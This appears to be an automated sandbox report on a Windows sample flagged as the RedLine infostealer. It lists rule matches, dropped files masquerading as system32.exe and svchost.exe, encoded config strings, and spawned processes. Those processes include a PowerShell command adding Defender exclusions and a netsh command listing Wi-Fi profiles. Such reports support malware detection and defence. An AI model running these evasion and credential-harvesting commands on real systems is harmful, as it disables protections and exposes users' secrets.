Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_011CDC90	5_2_011CDC90
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064A9630	5_2_064A9630
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064A4468	5_2_064A4468
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064AD528	5_2_064AD528
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064A1210	5_2_064A1210
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064A3320	5_2_064A3320
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064ADA30	5_2_064ADA30
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F61118	10_2_00007FF848F61118
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F3091D	10_2_00007FF848F3091D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F32178	10_2_00007FF848F32178
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F32BF8	10_2_00007FF848F32BF8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F4EBD0	10_2_00007FF848F4EBD0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F2AE02	10_2_00007FF848F2AE02
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F20E5D	10_2_00007FF848F20E5D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F32EC8	10_2_00007FF848F32EC8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F23D5E	10_2_00007FF848F23D5E
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F24D61	10_2_00007FF848F24D61
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F31DB8	10_2_00007FF848F31DB8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F2A056	10_2_00007FF848F2A056
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F32F00	10_2_00007FF848F32F00
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F59738	10_2_00007FF848F59738
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F30F8D	10_2_00007FF848F30F8D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F597B0	10_2_00007FF848F597B0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F20E70	10_2_00007FF848F20E70
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F5CEC0	10_2_00007FF848F5CEC0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F30FB8	10_2_00007FF848F30FB8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F30FD8	10_2_00007FF848F30FD8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F30FE8	10_2_00007FF848F30FE8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF849118600	10_2_00007FF849118600
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF8492A0E05	10_2_00007FF8492A0E05

Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs VzhY4BcvBH.exe
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs VzhY4BcvBH.exe
Source: VzhY4BcvBH.exe, 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs VzhY4BcvBH.exe
Source: VzhY4BcvBH.exe, 00000000.00000000.2014625083.0000000000E1A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinhost.exe4 vs VzhY4BcvBH.exe
Source: VzhY4BcvBH.exe	Binary or memory string: OriginalFilenamewinhost.exe4 vs VzhY4BcvBH.exe

Source: VzhY4BcvBH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 5.0.system32.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 10.2.svchost.exe.1d860000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 10.2.svchost.exe.1d860000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 10.2.svchost.exe.1d860000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 10.2.svchost.exe.1d860000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 10.2.svchost.exe.1d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.1d540000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: system32.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\system32.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: VzhY4BcvBH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10.2.svchost.exe.1d660000.8.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 10.2.svchost.exe.1d660000.8.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.1d660000.8.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: svchost.exe.0.dr, Settings.cs	Base64 encoded string: 'JDnIptC5SRXgwjX5au4x3Z5ByXQBIBk+UqS/F8siVjDInfiz0HIYnLlyoxcHDgigmeepGfpS5bcxnQqms7eoFQ==', 'go7vkLVW+82s99qCTb8hPmdnd3JbQG7qrFB72i8bg8tAsJ5d/wSR9XW7Lnz//avcq+ABe9wu41mqeNpIr1dv1Q==', 'RpXLZsmWgiynL/pdXJXn0CZZf+415za28QRHztrAgab7Bw4pGay97pXIWPhIkIYnbJZdWRWLF56HcY1nx662gOdvupuNv0dOAzPVldhYGTI=', 'PwuWC9ssG052uzLnwx82t3froxojDpH0Zo2ZQAqRvmlFYx7+hW+gSWHYouh981HSmgdVIRqSPoJ1dCLzD6Yhx/hJ/AmBQCq6DgSIQBNN4wGrtoXRgSNZCuL8mjdVum0/KNFJoS7Po92w1xVhsfH8MFal1R7TpO5aspxHsMGcgg3RmZi//A065ZFyS/2aA6BjKoGhavn4T7mEnkBtdO+9Rdoi8Vsz/XkYf/429InhQD03HVtOGRSJXFAGXdW2+0xNrTuInpsLEw/mu6lZZgjwzbKKVzSoFWhEuvcI+rGXxpQLK3L7sghe1/DJzqTNnOPk594WPHIbeUxsiTOsedzMu854709hf9sxWPFYnXT54AHy+0Y4Ad42ZP89HfClwe1PRtzNdrWKDn2xB3iZlA8oSNn0plhdjB8WQLqo7EFY2bJP13YkWtMVECJi0tUCkNf3MmdsSKZuRQb1IN/LkQ5gOxY6Ps940Iz/osPBOrqZY2AbaNOiEXPkI/Yu44auLHw79zPoHUMTdUYzKi5s5RtqVInqkAsF+6IlzvOYD2uRZkulr+5rgMSzZVpmwQmemWn0Si+7VMrG7xcJOmdVIyaNr0xO2byo0EvQ2JcvsHzKYHk4FmdqvwAAhD24vXpqaPu+RqDmA75LmTUM7lAVUaFI+TCuV6gjGPd+XQnIX9RWiBsUkndzuBxkUKp9XGHgXVauSzATGoXFa7+uNuUFpLzwA3ydpXd2nG9IZYP1T60i1FZfSgQ/szii195LI3rUizBn7mMbFEIBgZnvPTHNS7PHLvD5MeO10ggeyBj4YZXRZv7Z/Lj+urb3IhU1N+RFaDn7U+xaEtE/n9muzs0gMBJCfY/KxtojV/UnNsKUhEvJQnrrK357MWU2g4Gh+SteX0xrpt8Wtw61hy8F8WNHVoVSQMANfTwoCRuz5OOj0epc0qAODYanlnPp1EkYtg2D7cHe7u3yQ55dBJKCbM9byruJouLM9iVc6E6IV7gpy0U3KALfbBqYu2f0H+U5rBM3RYXOzkT/27pSHM+7BQ9J5KiC+mtzSiQhT3FTz8RGhlQQH7G+lIIlhSpoqF6bvcYaplCa', 'Lv2kzHQg3KuBph8lY4ScrHMRBx4Oz/jO8G1ESez7OsbZEGRLHxED9peeT0xP8SozLZq35Yy33nE0Y8BwyMi26/dOkZH3M6o1VxeGCMKkbjPF7VvS0vQ4an5FvR5nDdV1cVEpmgjqM0dzGkkz9VwybU8rjT33zRvoPyvw4413AJ/+lDN2vmmuSPUgsbLfdasJ5s3Ehx+1kdPcEl3VIuK8nCzNu2WaPR8V39CgO46dVfEo3GtEvOIs9zX9xlLuN+6K9/RcOHQbFrent6d56or94vXXgzidnQVcuiJODv8bR9g=', 't99RFf97owTPFFgNX1rpCS80nEvJ/igv0LjLIjBNTfm31gVyJPOo+67CrJlIhmCMfRpF9rpItDFueVA/QTug3g==', 'J2GeroLrzteQ/t8rrSHvBZQdEc6vEcA9qq/4qvB+psN0t674ph7L/4WHENN9d5jYEg57lymrSVVbXeOTybjv7w==', '+eB6KU5anGIyWFt9M1YR+ih97IcHXKP5M+HM1+CsYJ3JOrJ90YQoXwGULKDg9x2MnplBdx9Ogg7679wMXxjEtA==', 'lWhAj2XYsaHvVnDMiDw0g81GoJp/+1krOqm93bYxj3t9V3wX5q6U3YVbLjo9EwhOKbN3iTorSl2HfrnpGKd42w==', 't29r3CphbZWnPBUMn1y7rJsJ0ivmPj3psDDliujy5z6a4bP+7lSY5X+Nc/eUgbxPxFJQbYy9e0r6rylJholoWg=='
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, Settings.cs	Base64 encoded string: 'JDnIptC5SRXgwjX5au4x3Z5ByXQBIBk+UqS/F8siVjDInfiz0HIYnLlyoxcHDgigmeepGfpS5bcxnQqms7eoFQ==', 'go7vkLVW+82s99qCTb8hPmdnd3JbQG7qrFB72i8bg8tAsJ5d/wSR9XW7Lnz//avcq+ABe9wu41mqeNpIr1dv1Q==', 'RpXLZsmWgiynL/pdXJXn0CZZf+415za28QRHztrAgab7Bw4pGay97pXIWPhIkIYnbJZdWRWLF56HcY1nx662gOdvupuNv0dOAzPVldhYGTI=', 'PwuWC9ssG052uzLnwx82t3froxojDpH0Zo2ZQAqRvmlFYx7+hW+gSWHYouh981HSmgdVIRqSPoJ1dCLzD6Yhx/hJ/AmBQCq6DgSIQBNN4wGrtoXRgSNZCuL8mjdVum0/KNFJoS7Po92w1xVhsfH8MFal1R7TpO5aspxHsMGcgg3RmZi//A065ZFyS/2aA6BjKoGhavn4T7mEnkBtdO+9Rdoi8Vsz/XkYf/429InhQD03HVtOGRSJXFAGXdW2+0xNrTuInpsLEw/mu6lZZgjwzbKKVzSoFWhEuvcI+rGXxpQLK3L7sghe1/DJzqTNnOPk594WPHIbeUxsiTOsedzMu854709hf9sxWPFYnXT54AHy+0Y4Ad42ZP89HfClwe1PRtzNdrWKDn2xB3iZlA8oSNn0plhdjB8WQLqo7EFY2bJP13YkWtMVECJi0tUCkNf3MmdsSKZuRQb1IN/LkQ5gOxY6Ps940Iz/osPBOrqZY2AbaNOiEXPkI/Yu44auLHw79zPoHUMTdUYzKi5s5RtqVInqkAsF+6IlzvOYD2uRZkulr+5rgMSzZVpmwQmemWn0Si+7VMrG7xcJOmdVIyaNr0xO2byo0EvQ2JcvsHzKYHk4FmdqvwAAhD24vXpqaPu+RqDmA75LmTUM7lAVUaFI+TCuV6gjGPd+XQnIX9RWiBsUkndzuBxkUKp9XGHgXVauSzATGoXFa7+uNuUFpLzwA3ydpXd2nG9IZYP1T60i1FZfSgQ/szii195LI3rUizBn7mMbFEIBgZnvPTHNS7PHLvD5MeO10ggeyBj4YZXRZv7Z/Lj+urb3IhU1N+RFaDn7U+xaEtE/n9muzs0gMBJCfY/KxtojV/UnNsKUhEvJQnrrK357MWU2g4Gh+SteX0xrpt8Wtw61hy8F8WNHVoVSQMANfTwoCRuz5OOj0epc0qAODYanlnPp1EkYtg2D7cHe7u3yQ55dBJKCbM9byruJouLM9iVc6E6IV7gpy0U3KALfbBqYu2f0H+U5rBM3RYXOzkT/27pSHM+7BQ9J5KiC+mtzSiQhT3FTz8RGhlQQH7G+lIIlhSpoqF6bvcYaplCa', 'Lv2kzHQg3KuBph8lY4ScrHMRBx4Oz/jO8G1ESez7OsbZEGRLHxED9peeT0xP8SozLZq35Yy33nE0Y8BwyMi26/dOkZH3M6o1VxeGCMKkbjPF7VvS0vQ4an5FvR5nDdV1cVEpmgjqM0dzGkkz9VwybU8rjT33zRvoPyvw4413AJ/+lDN2vmmuSPUgsbLfdasJ5s3Ehx+1kdPcEl3VIuK8nCzNu2WaPR8V39CgO46dVfEo3GtEvOIs9zX9xlLuN+6K9/RcOHQbFrent6d56or94vXXgzidnQVcuiJODv8bR9g=', 't99RFf97owTPFFgNX1rpCS80nEvJ/igv0LjLIjBNTfm31gVyJPOo+67CrJlIhmCMfRpF9rpItDFueVA/QTug3g==', 'J2GeroLrzteQ/t8rrSHvBZQdEc6vEcA9qq/4qvB+psN0t674ph7L/4WHENN9d5jYEg57lymrSVVbXeOTybjv7w==', '+eB6KU5anGIyWFt9M1YR+ih97IcHXKP5M+HM1+CsYJ3JOrJ90YQoXwGULKDg9x2MnplBdx9Ogg7679wMXxjEtA==', 'lWhAj2XYsaHvVnDMiDw0g81GoJp/+1krOqm93bYxj3t9V3wX5q6U3YVbLjo9EwhOKbN3iTorSl2HfrnpGKd42w==', 't29r3CphbZWnPBUMn1y7rJsJ0ivmPj3psDDliujy5z6a4bP+7lSY5X+Nc/eUgbxPxFJQbYy9e0r6rylJholoWg=='

Source: svchost.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: VzhY4BcvBH.exe, Program.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: VzhY4BcvBH.exe, Program.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@28/195@8/5

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

File created: C:\Users\user\AppData\Roaming\system32.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Mutant created: \Sessions\1\BaseNamedObjects\3CRVnJNVJAloBrRuK
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\xtqapdqeqwwlkdcvcat
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tylvtvx.sux.ps1

Jump to behavior

Source: VzhY4BcvBH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VzhY4BcvBH.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpE153.tmp.5.dr, tmp5E7B.tmp.dat.10.dr, tmpC71A.tmp.5.dr, tmpC74B.tmp.5.dr, tmp8D79.tmp.5.dr, tmp1854.tmp.5.dr, tmp8DB9.tmp.5.dr, tmp1875.tmp.5.dr, tmp6048.tmp.dat.10.dr, tmp6BB5.tmp.dat.10.dr, tmpC73A.tmp.5.dr, tmpE173.tmp.5.dr, tmp1844.tmp.5.dr, tmp8D99.tmp.5.dr, tmp1885.tmp.5.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: VzhY4BcvBH.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\VzhY4BcvBH.exe "C:\Users\user\Desktop\VzhY4BcvBH.exe"
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\system32.exe "C:\Users\user\AppData\Roaming\system32.exe"
Source: C:\Users\user\AppData\Roaming\system32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
